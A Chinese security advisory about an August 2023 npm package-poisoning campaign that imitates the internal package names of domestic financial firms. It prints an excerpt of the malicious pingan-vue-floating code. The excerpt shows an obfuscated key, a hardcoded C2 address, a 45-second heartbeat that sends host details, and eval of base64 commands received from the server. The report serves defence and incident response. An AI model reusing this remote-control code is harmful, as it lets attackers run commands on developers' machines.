最近关于针对国内金融企业的开源组件投毒攻击事件

2023-08-16 09:31:39 【大中小】

2023年8月9日，墨菲监控到用户名为 snugglejack_org (邮件地址：SnuggleBearrxx@hotmail.com）的用户发布到 NPM 仓库中的 ws-paso-jssdk 组件包具有发向 https://ql.rustdesk[.]net 的可疑流量，经过确认该组件包携带远控脚本，从攻击者可控的 C2 服务器接收并执行系统命令，该组件包于2023年8月10日7点 21 分从 NPM 仓库下架。

经过持续跟踪发现，该投毒者继续向 NPM 仓库继续发布了 pingan-vue-floating 等类似恶意组件包，投毒包的恶意 C2 地址改为了 62.234.32.226 ，此 IP 为以北京腾讯云提供，并且投毒包以 pingan、ynf 等命名，很大几率是针对国内厂商(例如中国*安)，投毒者通过模拟目标企业内部私有源组件命名进行混淆，进而通过诱导用户企业内部用户下载投毒组件包实现对目标机器的远控入侵，这是目前公开发现的首起针对国内金融企业的开源组件投毒攻击事件。

投毒分析

以pingan-vue-floating-0.0.7组件为例，该组件包通过 pm2 创建守护线程，每隔 45 秒后向攻击者可控的恶意C2服务器发送请求维持心跳，进而接收并执行攻击者发送的系统命令

//pingan-vue-floating-0.0.7/app.js
const key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split("").map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join("")+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join("")})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join("")})(36,167,112)const url = "http://62.234.32.226:8888"const filename = path.join(os.tmpdir(), "node_logs.txt");const headersCnf = { headers: { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134" }};……functionheartbeat(){ const requestData = { hostname: os.hostname(), uuid:machineIdSync({original:true}), os:os.platform(), }; sendRequest(url+"/api/index",aesEncrypt(JSON.stringify(requestData))) const task = { uuid:machineIdSync({original:true}), } sendRequest(url+"/api/captcha",aesEncrypt(JSON.stringify(task))).then(result => { try{ if (result !== undefined) { const data = JSON.parse(result); const decodedData = Buffer.from(data.code,"base64").toString(); eva l(decodedData) } }catch (error){ } });
}
functionapp(){ const result = checkFile(); if (result.exists) { return }else { createTmpFile(); setInterval(heartbeat,45000); }}app()

此次事件的攻击者投毒的所有组件列表

Tip：请各单位自行排查！



【大中小】【打印】【关闭】【返回顶部】
分享到:
上一篇：WinRAR解压缩软件存在漏洞，允许..	下一篇：中国银行嘉兴分行被罚210万,违规..

行业动态

联系我们